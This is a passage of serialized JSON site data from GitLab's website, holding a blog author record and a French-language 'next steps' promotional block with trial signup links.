Footer","shared/fr-fr/main-footer.yml","shared/fr-fr/main-footer",[676],{"_path":677,"_dir":678,"_draft":6,"_partial":6,"_locale":7,"content":679,"config":683,"_id":685,"_type":25,"title":16,"_source":27,"_file":686,"_stem":687,"_extension":30},"/en-us/blog/authors/michael-henriksen","authors",{"name":16,"config":680},{"headshot":681,"ctfId":682},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659488/Blog/Author%20Headshots/gitlab-logo-extra-whitespace.png","3DmojnawcJFqAgoNMCpFTX",{"template":684},"BlogAuthor","content:en-us:blog:authors:michael-henriksen.yml","en-us/blog/authors/michael-henriksen.yml","en-us/blog/authors/michael-henriksen",{"_path":689,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"header":690,"eyebrow":691,"blurb":692,"button":693,"secondaryButton":697,"_id":699,"_type":25,"title":700,"_source":27,"_file":701,"_stem":702,"_extension":30},"/shared/fr-fr/next-steps","Commencez à livrer des logiciels de meilleurs qualité plus rapidement","Plus de 50 % des entreprises du classement Fortune 100 font confiance à GitLab","Découvrez comment la plateforme DevSecOps intelligente\n\n\npeut aider votre équipe.\n",{"text":41,"config":694},{"href":695,"dataGaName":44,"dataGaLocation":696},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":46,"config":698},{"href":48,"dataGaName":49,"dataGaLocation":696},"content:shared:fr-fr:next-steps.yml","Next Steps","shared/fr-fr/next-steps.yml","shared/fr-fr/next-steps",1759347875013]